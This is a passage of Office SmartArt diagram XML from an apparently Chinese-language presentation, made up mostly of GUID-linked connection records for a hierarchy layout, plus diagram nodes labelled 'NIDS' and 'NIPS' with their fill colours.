    <dgm:cxn modelId="{7997DA10-34A8-445E-BA53-B6EBE380AB45}" type="presOf" srcId="{20003E0B-7CB9-411F-B0D2-4A2D8D67006C}" destId="{214BCA67-E843-4A88-B032-EEC3B0B9963E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{37F15912-3CAC-4073-84AB-960998F85983}" srcId="{83CEAF30-2A2E-4B49-8A2E-A96309B1F3FD}" destId="{049358E2-3FE1-4772-B729-DD82C384636B}" srcOrd="1" destOrd="0" parTransId="{FC2319FD-1A3B-480E-86D3-9B6E313B3632}" sibTransId="{F8BF61DB-1CB2-4A57-A32A-4C376B781D50}"/>
    <dgm:cxn modelId="{BD85E614-BC44-41ED-8863-E2CFFC749887}" type="presOf" srcId="{4401475D-44F2-4BC0-93BA-42264B451FEE}" destId="{8E0BFAAD-189D-4E90-813B-3DDAF13F11C1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{6486BB16-00E0-435A-8DD3-0D39B7F1EBC0}" type="presOf" srcId="{910359DB-6C70-4091-A963-6CDC2106C3AF}" destId="{8946562E-3F52-4BE5-8DC9-6791894DA8F7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D44A4119-EA7E-42E4-9259-633F9C2E9CA6}" type="presOf" srcId="{E4F85FED-DC97-4A16-ADBA-01746117A53D}" destId="{60056BF4-C331-4906-87AD-6742D94A9203}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{4B36A91B-ED3A-407A-BFB2-9174217E2201}" type="presOf" srcId="{F16A4F96-D9B6-43F0-A1B3-B978BB86476B}" destId="{CD49B43D-ABC7-46C8-82C3-681297B4C7DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{872DB01F-8270-487D-809D-74052A706E6B}" srcId="{4C08F03F-E496-45DE-BD41-EFBB13B813EE}" destId="{78418E4E-C82C-438F-B343-E98ADCEAE396}" srcOrd="2" destOrd="0" parTransId="{04CBB856-B280-45D9-B4FB-5581734C89BA}" sibTransId="{5366F848-6F6B-47C5-977C-263B52F6F640}"/>
    <dgm:cxn modelId="{1CE56722-1B1E-46FB-96BB-C4C0D2F8A808}" srcId="{4C08F03F-E496-45DE-BD41-EFBB13B813EE}" destId="{E4F85FED-DC97-4A16-ADBA-01746117A53D}" srcOrd="0" destOrd="0" parTransId="{63E2A71E-CA7D-4817-8634-BB59BACAB105}" sibTransId="{458DEFDC-DDC3-462E-943B-1B859E8AEC04}"/>
    <dgm:cxn modelId="{00BA3F23-3CCE-4F02-900B-A1CF473D7A99}" type="presOf" srcId="{51D2F229-7C61-48D3-89EF-C517136483CE}" destId="{5AA10CF2-5F63-49E8-9FA1-86577DAD8C46}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{0149C832-47FF-476D-B87F-5ACC1273DD1A}" srcId="{83CEAF30-2A2E-4B49-8A2E-A96309B1F3FD}" destId="{51D2F229-7C61-48D3-89EF-C517136483CE}" srcOrd="2" destOrd="0" parTransId="{526DCA8C-8B70-4B5E-B972-45080C894CD9}" sibTransId="{5DB0491E-5E8A-4CBC-AABF-75BFBDAEDBC8}"/>
    <dgm:cxn modelId="{9C26913B-7B25-4782-850F-21ACF72A8590}" srcId="{4C08F03F-E496-45DE-BD41-EFBB13B813EE}" destId="{83CEAF30-2A2E-4B49-8A2E-A96309B1F3FD}" srcOrd="3" destOrd="0" parTransId="{F16A4F96-D9B6-43F0-A1B3-B978BB86476B}" sibTransId="{1BDEB7C2-4085-4463-878C-8223C18A9ED7}"/>
    <dgm:cxn modelId="{776EF75E-9D1B-4237-9970-7AE2A586E074}" type="presOf" srcId="{83CEAF30-2A2E-4B49-8A2E-A96309B1F3FD}" destId="{86CD2934-69D3-42E9-8472-75D517C29305}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{5A9B4446-1257-4E1A-B7A1-5BC4367B8A5C}" type="presOf" srcId="{049358E2-3FE1-4772-B729-DD82C384636B}" destId="{9B3B5183-2262-4052-B369-3146D709039A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AAEDFF48-7FBD-4106-B939-E22BA6095E41}" type="presOf" srcId="{63E2A71E-CA7D-4817-8634-BB59BACAB105}" destId="{BFE71098-3182-402D-8CD3-1657F5586277}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{07206576-E734-4742-8025-65D1C5A9C2D6}" type="presOf" srcId="{78418E4E-C82C-438F-B343-E98ADCEAE396}" destId="{90F35A37-7713-4CF7-B2CB-0F0456BE3473}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{ED37058A-1D43-4858-9025-BEB542AD852F}" srcId="{4C08F03F-E496-45DE-BD41-EFBB13B813EE}" destId="{910359DB-6C70-4091-A963-6CDC2106C3AF}" srcOrd="4" destOrd="0" parTransId="{20003E0B-7CB9-411F-B0D2-4A2D8D67006C}" sibTransId="{2233D61F-3CF7-46BA-92B3-F310F3A9DA16}"/>
    <dgm:cxn modelId="{3AAC4D8C-4B38-4747-AE08-6A4E7A5AA5C5}" type="presOf" srcId="{526DCA8C-8B70-4B5E-B972-45080C894CD9}" destId="{5CFB158B-2A76-4C8B-AA32-C0643EE36651}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{4A80A2A5-038D-4798-80B1-386369ABCD6F}" type="presOf" srcId="{DBF6043E-6380-404B-B97A-F45A60A017EF}" destId="{BD0C8646-58AF-4BF2-AF58-C33831BEB8BC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{A4199CAE-952D-4846-A80B-283B1A5F3E79}" type="presOf" srcId="{CAF919E6-61F7-484A-BDEA-5D1F2E5EB6A1}" destId="{86952AA4-5A7C-45C0-B7A7-DB9E1BFA4C99}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D79A8EC3-C3DE-45D2-839C-8B1FA14FE06B}" srcId="{4C08F03F-E496-45DE-BD41-EFBB13B813EE}" destId="{4401475D-44F2-4BC0-93BA-42264B451FEE}" srcOrd="1" destOrd="0" parTransId="{DBF6043E-6380-404B-B97A-F45A60A017EF}" sibTransId="{BD13FD54-A0E0-4B11-AC18-3901602504E9}"/>
    <dgm:cxn modelId="{C58B12C9-DD2F-4FDC-AF87-3F3A659A11BC}" type="presOf" srcId="{FC2319FD-1A3B-480E-86D3-9B6E313B3632}" destId="{DD2A41E7-EB35-4A72-B880-2C4E031E5CEC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{3E8776D0-D9D7-4D7A-AEDC-E1CD59F2412E}" type="presOf" srcId="{04CBB856-B280-45D9-B4FB-5581734C89BA}" destId="{0BA44529-A63A-4BFE-885E-0F789876865A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{7EDD4AD6-5839-4910-B066-850438D4B1A0}" type="presOf" srcId="{C5B8EA6C-8CE3-4AFB-B15B-3D6E6E3D9D97}" destId="{1942F3CC-C71F-4237-8AC5-5EE7682A31ED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D3ABAAD7-4010-4994-9F74-11087B24AEBE}" type="presOf" srcId="{4C08F03F-E496-45DE-BD41-EFBB13B813EE}" destId="{16FBB9D9-5389-4419-B3DA-B5F803EFAAC7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{1D8277E0-5024-4EA0-8346-606B7653DF1C}" srcId="{83CEAF30-2A2E-4B49-8A2E-A96309B1F3FD}" destId="{045D82A6-3A41-49EE-B7E8-1F3391902772}" srcOrd="0" destOrd="0" parTransId="{CAF919E6-61F7-484A-BDEA-5D1F2E5EB6A1}" sibTransId="{1709DB08-275F-40C8-BC19-EF6C12D8C2F3}"/>
    <dgm:cxn modelId="{0DC04CFA-8852-43F1-A9AF-CD6A7A8B064A}" srcId="{C5B8EA6C-8CE3-4AFB-B15B-3D6E6E3D9D97}" destId="{4C08F03F-E496-45DE-BD41-EFBB13B813EE}" srcOrd="0" destOrd="0" parTransId="{6BCDD91C-BA81-4333-AA0D-7410EE0AA8A9}" sibTransId="{EAF0FDAF-6EB7-4EEF-9672-58018CE1CDB0}"/>
    <dgm:cxn modelId="{34E4A390-8172-450B-8079-526710776B19}" type="presParOf" srcId="{1942F3CC-C71F-4237-8AC5-5EE7682A31ED}" destId="{379E4451-41AB-4175-BA0D-3E79156AEF52}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{56EA6410-5778-4805-9C46-AE6BC8BA3238}" type="presParOf" srcId="{379E4451-41AB-4175-BA0D-3E79156AEF52}" destId="{D0683CC2-02F9-444E-8D39-14F616783710}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{7C13BFCD-0CAB-4DB5-9929-5AE4E5EA1477}" type="presParOf" srcId="{D0683CC2-02F9-444E-8D39-14F616783710}" destId="{CE13E43E-07CF-4376-8B9B-A6CD91B4ED42}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{CF5FBDE4-AA73-4C14-A3A7-E2967FA8F051}" type="presParOf" srcId="{D0683CC2-02F9-444E-8D39-14F616783710}" destId="{16FBB9D9-5389-4419-B3DA-B5F803EFAAC7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{41D0C5A0-ABE0-4E67-A7E7-CABD1ED39C7A}" type="presParOf" srcId="{379E4451-41AB-4175-BA0D-3E79156AEF52}" destId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{DC6E4402-0ABA-4E12-8CF0-ABA0E6FC7406}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{BFE71098-3182-402D-8CD3-1657F5586277}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{85A85C68-64CD-4313-8C8B-418FA1433DA2}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{94467064-0AA7-40A4-820E-1EDBC76CAD69}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{72DFCAA5-70F7-41E5-A847-52080966FBC4}" type="presParOf" srcId="{94467064-0AA7-40A4-820E-1EDBC76CAD69}" destId="{EBFCF893-E77B-4042-9457-78290F36F9E8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B98D01D1-C3FA-40EA-A0CB-C35BA47790B4}" type="presParOf" srcId="{EBFCF893-E77B-4042-9457-78290F36F9E8}" destId="{D1339A8A-B60F-4639-AC29-6938B28BC0A8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{747BF9B6-01C5-4C3D-BA0F-F71017830795}" type="presParOf" srcId="{EBFCF893-E77B-4042-9457-78290F36F9E8}" destId="{60056BF4-C331-4906-87AD-6742D94A9203}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{FB7D34EC-876D-45CA-BE44-5BF86E010FE6}" type="presParOf" srcId="{94467064-0AA7-40A4-820E-1EDBC76CAD69}" destId="{236A1410-FCEF-42A3-B70B-CB7FDF3E056E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F3420771-4EC4-44A6-8B34-DD99A07EDD27}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{BD0C8646-58AF-4BF2-AF58-C33831BEB8BC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{4D1C20FA-211F-4CAB-8436-1407E40ECE79}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{AC297558-C0C2-49C6-965B-81CFD6F9D874}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F9ADACF8-4113-4D85-81CD-2952D5DD8A72}" type="presParOf" srcId="{AC297558-C0C2-49C6-965B-81CFD6F9D874}" destId="{77ACC8C2-FBBC-44BD-B550-C5FD843255BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{1F4494B5-60F5-441B-B55D-0D7C57C1C88D}" type="presParOf" srcId="{77ACC8C2-FBBC-44BD-B550-C5FD843255BA}" destId="{E2FEE80E-66FF-4C35-9F5F-579399B41B8A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AC78A015-354E-4BAC-A9D6-4CD5CE33A763}" type="presParOf" srcId="{77ACC8C2-FBBC-44BD-B550-C5FD843255BA}" destId="{8E0BFAAD-189D-4E90-813B-3DDAF13F11C1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{5A5751BA-024B-42F9-895C-E1B9C50F6148}" type="presParOf" srcId="{AC297558-C0C2-49C6-965B-81CFD6F9D874}" destId="{C1465545-F05D-4F8F-BC02-AABC4FEFC1B4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{CF5D9BF3-1197-4D24-9638-EA698AC76C4A}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{0BA44529-A63A-4BFE-885E-0F789876865A}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9CA9AB68-162A-4A2C-B945-854FDC307E75}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{444181FA-015C-4AEF-9D7E-FA949A7DB303}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F0A221F5-ADBE-4915-B878-1C6EC1D9C5D4}" type="presParOf" srcId="{444181FA-015C-4AEF-9D7E-FA949A7DB303}" destId="{BF3EED2D-4E5D-43EA-B27D-C77BA1682A8B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{787F2835-593F-4918-AA32-5AF8F9D505F7}" type="presParOf" srcId="{BF3EED2D-4E5D-43EA-B27D-C77BA1682A8B}" destId="{6CCEA0C0-3D06-472A-BEE2-FF3EC5601C1E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{02503A84-AC10-4AC1-ACD4-AB90DDABF3B8}" type="presParOf" srcId="{BF3EED2D-4E5D-43EA-B27D-C77BA1682A8B}" destId="{90F35A37-7713-4CF7-B2CB-0F0456BE3473}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{76128AF2-3480-4763-80B3-BD56313842AB}" type="presParOf" srcId="{444181FA-015C-4AEF-9D7E-FA949A7DB303}" destId="{72A14F11-DC8F-42C3-9D25-D170C752528C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{BB919519-6782-42E9-B4CD-C93A90AEB3DF}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{CD49B43D-ABC7-46C8-82C3-681297B4C7DB}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9F8A0EC7-830F-4CE9-BF53-86C4EDA46F21}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{90C3334B-9946-4BCD-B4C7-4E33CBB961DA}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{72DB4792-D9C5-4902-8CA1-99F4976488CC}" type="presParOf" srcId="{90C3334B-9946-4BCD-B4C7-4E33CBB961DA}" destId="{6B059E49-4EC0-4D47-A962-6422D730DB67}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{0B4676E4-FD80-4495-8074-DCEC60F8A16B}" type="presParOf" srcId="{6B059E49-4EC0-4D47-A962-6422D730DB67}" destId="{885F89CA-0414-4CE7-BA90-D0620FC91B24}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{78B8A2BB-D8F2-41F9-BFD2-9E05F4895632}" type="presParOf" srcId="{6B059E49-4EC0-4D47-A962-6422D730DB67}" destId="{86CD2934-69D3-42E9-8472-75D517C29305}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{BEFDD52B-A9A9-418A-A5A6-5362861A3637}" type="presParOf" srcId="{90C3334B-9946-4BCD-B4C7-4E33CBB961DA}" destId="{09CC2D1C-A5DC-4C8B-A577-3A692758381B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F34E2CA4-B9A1-4205-AFD6-E2B103AB8CE1}" type="presParOf" srcId="{09CC2D1C-A5DC-4C8B-A577-3A692758381B}" destId="{86952AA4-5A7C-45C0-B7A7-DB9E1BFA4C99}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9520018F-D846-44AE-9019-E30C7CBDD419}" type="presParOf" srcId="{09CC2D1C-A5DC-4C8B-A577-3A692758381B}" destId="{6ACF658D-6C08-4532-9173-B15DA5850DBC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{2A2426C6-3EEB-4333-9208-21315BA00E74}" type="presParOf" srcId="{6ACF658D-6C08-4532-9173-B15DA5850DBC}" destId="{F0E75A4E-2073-42EE-ABB9-1D78357AFA0A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{573822DE-DBEB-4B44-8F9E-37CF70645624}" type="presParOf" srcId="{F0E75A4E-2073-42EE-ABB9-1D78357AFA0A}" destId="{58F2A323-E817-42FA-8571-94A639BAAC01}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{19A12728-AD44-4DDA-97F6-D45AEC29232F}" type="presParOf" srcId="{F0E75A4E-2073-42EE-ABB9-1D78357AFA0A}" destId="{9C8AD53C-1D5D-45BF-8D70-201111F24C6E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F679F764-70E5-49D1-AF6F-769E63E67108}" type="presParOf" srcId="{6ACF658D-6C08-4532-9173-B15DA5850DBC}" destId="{E858720A-D9D8-4966-849B-5F838ED9315E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{446C3D49-1182-42ED-80EE-C503E8B4FE8A}" type="presParOf" srcId="{09CC2D1C-A5DC-4C8B-A577-3A692758381B}" destId="{DD2A41E7-EB35-4A72-B880-2C4E031E5CEC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{4CECE31E-A623-445F-B8EC-E106B5F75ED1}" type="presParOf" srcId="{09CC2D1C-A5DC-4C8B-A577-3A692758381B}" destId="{71E325AB-5D53-4FFD-BB7B-1DC046F1BD26}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{7FCD7006-058B-4CF0-8B73-358B971846D6}" type="presParOf" srcId="{71E325AB-5D53-4FFD-BB7B-1DC046F1BD26}" destId="{1A382D3C-30BF-4D12-B482-15EF1831B5AB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{A79033C8-5882-4D2A-9CE6-38BB6069458F}" type="presParOf" srcId="{1A382D3C-30BF-4D12-B482-15EF1831B5AB}" destId="{B3025DA8-545F-4105-8F25-1351ACD510EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B7CAE705-E63C-4AD6-897C-C21E78F19748}" type="presParOf" srcId="{1A382D3C-30BF-4D12-B482-15EF1831B5AB}" destId="{9B3B5183-2262-4052-B369-3146D709039A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{541EB672-D651-4A69-9750-D55CC2FE964B}" type="presParOf" srcId="{71E325AB-5D53-4FFD-BB7B-1DC046F1BD26}" destId="{BAC507DB-C7CF-4DE4-9B01-FD299AA97728}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{41121A7D-101F-4F72-A200-2BA36440E339}" type="presParOf" srcId="{09CC2D1C-A5DC-4C8B-A577-3A692758381B}" destId="{5CFB158B-2A76-4C8B-AA32-C0643EE36651}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{6ABB50BC-B9D5-4DB1-844F-EBCD9FC438C0}" type="presParOf" srcId="{09CC2D1C-A5DC-4C8B-A577-3A692758381B}" destId="{D3F0EEF5-95E0-4294-87F2-BBF2ECBF97BD}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{2B9651BC-8098-4272-B14C-53FBB9500701}" type="presParOf" srcId="{D3F0EEF5-95E0-4294-87F2-BBF2ECBF97BD}" destId="{3B172109-8E14-49E1-B758-B5CA8D86FD16}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{3F621E9B-A3EB-4E1D-BD97-4B87CF2DBDD7}" type="presParOf" srcId="{3B172109-8E14-49E1-B758-B5CA8D86FD16}" destId="{710F1BF2-9645-48F5-927A-75C0426D8802}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{EDC8E474-0CF8-420C-BAAF-FD5457F71EE4}" type="presParOf" srcId="{3B172109-8E14-49E1-B758-B5CA8D86FD16}" destId="{5AA10CF2-5F63-49E8-9FA1-86577DAD8C46}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{6F78280C-27AB-4CAC-9D7F-FB5DF620282D}" type="presParOf" srcId="{D3F0EEF5-95E0-4294-87F2-BBF2ECBF97BD}" destId="{FFA8DC17-0A8D-4845-87D9-9C2E85BC8F75}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{033AA21E-2FDE-4939-BBB7-8805FC5C9101}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{214BCA67-E843-4A88-B032-EEC3B0B9963E}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{EAEB1D44-F872-4458-AB2A-26481F037DC7}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{1440ABFD-ECAA-49D0-B8C7-8E9B2E5B4F87}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{0745E3CC-9A7C-4BC3-AB79-3680968A51D0}" type="presParOf" srcId="{1440ABFD-ECAA-49D0-B8C7-8E9B2E5B4F87}" destId="{71CE42A2-0BEA-4FCC-BD10-2719FD8615E0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{4CC76DCC-2651-44B2-82CA-A032B900C0A3}" type="presParOf" srcId="{71CE42A2-0BEA-4FCC-BD10-2719FD8615E0}" destId="{F160C20B-CA02-4A23-92A9-8856245BAA71}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{5133A4F4-8A95-47EF-8AC2-659F3FDFE88D}" type="presParOf" srcId="{71CE42A2-0BEA-4FCC-BD10-2719FD8615E0}" destId="{8946562E-3F52-4BE5-8DC9-6791894DA8F7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{6FA45F5F-2582-4D40-9F88-F778F806ED21}" type="presParOf" srcId="{1440ABFD-ECAA-49D0-B8C7-8E9B2E5B4F87}" destId="{B3B7596E-9E1D-4464-8B7B-6D6BF661545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104485-A5D0-4AF7-A9E6-4EB4B401A449}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/default#1" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1#2" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2#1" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7ED8B5E-A80E-485C-B363-26978F3DDCB8}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="FFEC4C"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            <a:t>NIDS</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9DF5A6E2-5388-4ACE-BF94-62E5A55F43EF}" type="parTrans" cxnId="{0815C02E-F57B-4377-9B2A-290F8E418C86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7225577-9242-479A-8178-1538A743A57B}" type="sibTrans" cxnId="{0815C02E-F57B-4377-9B2A-290F8E418C86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C58960E7-4EF9-4308-96F7-F6C03C6E0045}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            <a:t>NIPS</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6DEA0F89-DFA9-4A41-B97F-5442F9D0A035}" type="parTrans" cxnId="{A89BC91A-ABBF-4C18-B84F-FAD512D35C34}">
      <dgm:prSet/>
